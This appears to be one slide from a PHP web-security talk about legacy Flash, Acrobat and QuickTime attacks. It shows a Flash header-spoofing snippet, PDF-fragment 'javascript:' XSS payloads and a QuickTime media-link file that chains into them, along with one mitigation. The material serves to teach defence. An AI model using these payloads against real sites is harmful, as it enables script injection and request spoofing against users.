| Better Web Apps with PHP 5 |
 |
2025-02-27 |
 |
 |
26 |
 |
|
Remote spoofing arbitrary request headers
Courtesy of IE and Flash
var req = new LoadVars();
req.addRequestHeader("Host:", "host.example.com");
req.send("http://host.foo.com/", "_blank");
A variation allows request splitting against servers with keep-alive enabled.
Macrodobe involved again
Acrobat
http://example.org/foo.pdf#bar=javascript:alert('XSS');
Don't serve PDFs
AddType application/octet-stream .pdf
Local too
file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#a=javascript:...
Embed it in a media file to trick Firefox
<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true"
qtnext="file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#a=javascript:your_code_here"/>
